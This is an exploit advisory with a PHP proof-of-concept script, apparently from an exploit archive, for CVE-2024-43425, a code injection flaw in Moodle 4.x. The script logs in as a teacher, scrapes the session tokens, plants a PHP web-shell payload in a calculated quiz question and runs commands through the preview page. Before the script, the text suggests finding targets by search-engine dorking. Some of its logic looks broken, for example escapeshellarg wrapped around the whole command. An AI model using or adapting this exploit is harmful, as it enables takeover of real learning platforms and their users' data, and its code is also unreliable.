=============================================================================================================================================
| # Title     : Moodle 4.x PHP Code Injection Vulnerability                                                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://moodle.com/moodle-4/                                                                                                |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: (PHP Code Injection Vulnerability) in Moodle (CVE-2024-43425). The module executes commands using command injection through the Moodle quiz question feature.
	
[+] save code as poc.php .

[+] Set Target : line 8 + 9 + 10

[+] USage : php poc.php 

[+] PayLoad :

<?php

//CVE-2024-43425
//https://packetstorm.news/files/id/183003/


// إعدادات الاستغلال
$target = "http://example.com"; // رابط Moodle المستهدف
$username = "teacher";
$password = "password";

// تخزين الكوكيز
$cookie_file = tempnam(sys_get_temp_dir(), "cookies");

// دالة لتنفيذ طلب HTTP عبر cURL
function send_request($url, $post_fields = null, $use_cookie = true) {
    global $cookie_file;
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    if ($use_cookie) {
        curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
    }
    if ($post_fields) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
    }
    $response = curl_exec($ch);
    if (curl_errno($ch)) {
        die("خطأ في cURL: " . curl_error($ch) . "\n");
    }
    curl_close($ch);
    return $response;
}

// 1. الحصول على `logintoken`
$login_page = send_request("$target/login/index.php", null, false);
preg_match('/name="logintoken" value="(.*?)"/', $login_page, $matches);
$logintoken = $matches[1] ?? die("❌ فشل في الحصول على logintoken\n");

// 2. تسجيل الدخول
$login_data = [
    "username" => $username,
    "password" => $password,
    "logintoken" => $logintoken
];
$response = send_request("$target/login/index.php", $login_data);

// التأكد من نجاح تسجيل الدخول
if (strpos($response, "dashboard") === false) {
    die("❌ فشل تسجيل الدخول!\n");
}

// 3. الحصول على `sesskey`
$dashboard = send_request("$target/my/");
preg_match('/"sesskey":"(.*?)"/', $dashboard, $matches);
$sesskey = $matches[1] ?? die("❌ فشل في الحصول على sesskey\n");

// 4. استخراج `courseContextId`
preg_match('/data-contextid="(\d+)"/', $dashboard, $matches);
$courseContextId = $matches[1] ?? die("❌ فشل في الحصول على courseContextId\n");

// 5. إضافة السؤال مع الحمولة (Payload)
$payload = "<p><?php system(escapeshellarg(\$_GET['a'] ?? 'id')); ?></p>";
$question_data = [
    "category" => "$courseContextId,1",
    "sesskey" => $sesskey,
    "qtype" => "calculated",
    "name" => "exploit",
    "questiontext[text]" => $payload,
    "questiontext[format]" => "1",
    "submitbutton" => "Save changes"
];
send_request("$target/question/question.php", $question_data);

// 6. تنفيذ الأوامر عبر الطلب GET
$cmd = $_GET['a'] ?? 'id';
$response = send_request("$target/question/preview.php?a=" . urlencode($cmd));

// عرض النتيجة
echo "✅ نتيجة التنفيذ:\n";
echo htmlspecialchars($response);

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================